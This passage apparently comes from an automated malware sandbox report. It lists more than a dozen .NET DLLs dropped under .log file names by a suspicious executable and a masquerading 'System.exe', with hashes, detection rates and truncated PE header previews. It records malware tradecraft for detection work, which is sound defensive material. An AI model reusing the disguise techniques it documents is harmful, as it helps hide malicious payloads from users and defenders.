                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\PxIPwdiO.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):342528
                                                                                                    Entropy (8bit):6.170134230759619
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                    MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                    SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                    SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                    SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\QgDirqoj.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38912
                                                                                                    Entropy (8bit):5.679286635687991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                    MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                    SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                    SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                    SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\SVvXiHdY.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36352
                                                                                                    Entropy (8bit):5.668291349855899
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                    MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                    SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                    SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                    SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\WepxKXjB.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):50176
                                                                                                    Entropy (8bit):5.723168999026349
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                    MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                    SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                    SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                    SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\bZqOSDZv.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38400
                                                                                                    Entropy (8bit):5.699005826018714
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                    MD5:87765D141228784AE91334BAE25AD743
                                                                                                    SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                    SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                    SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\dUteJCDk.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):294912
                                                                                                    Entropy (8bit):6.010605469502259
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                    MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                    SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                    SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                    SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                    C:\Users\user\Desktop\fePfJVil.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33792
                                                                                                    Entropy (8bit):5.541771649974822
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 38%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\hFbfZzNA.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38400
                                                                                                    Entropy (8bit):5.699005826018714
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                    MD5:87765D141228784AE91334BAE25AD743
                                                                                                    SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                    SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                    SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\iuTVQPCp.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):294912
                                                                                                    Entropy (8bit):6.010605469502259
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                    MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                    SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                    SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                    SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                    C:\Users\user\Desktop\kIKeCfec.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38912
                                                                                                    Entropy (8bit):5.679286635687991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                    MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                    SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                    SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                    SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\lniDCMno.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):50176
                                                                                                    Entropy (8bit):5.723168999026349
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                    MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                    SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                    SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                    SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\npUmXvsj.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):342528
                                                                                                    Entropy (8bit):6.170134230759619
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                    MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                    SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                    SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                    SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\qaACfJCc.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64000
                                                                                                    Entropy (8bit):5.857602289000348
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                    MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                    SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                    SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                    SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\rWndvGZf.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):85504
                                                                                                    Entropy (8bit):5.8769270258874755
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                    C:\Users\user\Desktop\rxSvtOmf.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32768
                                                                                                    Entropy (8bit):5.645950918301459
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                    MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                    SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                    SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                    SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\syOLALyL.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64000
                                                                                                    Entropy (8bit):5.857602289000348
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                    MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                    SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                    SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                    SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\ujtbHYJE.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36352
                                                                                                    Entropy (8bit):5.668291349855899
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                    MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                    SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                    SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                    SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\urdulIjK.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):85504
                                                                                                    Entropy (8bit):5.8769270258874755
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                    C:\Users\user\Desktop\zNoaAjFw.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32256
                                                                                                    Entropy (8bit):5.631194486392901
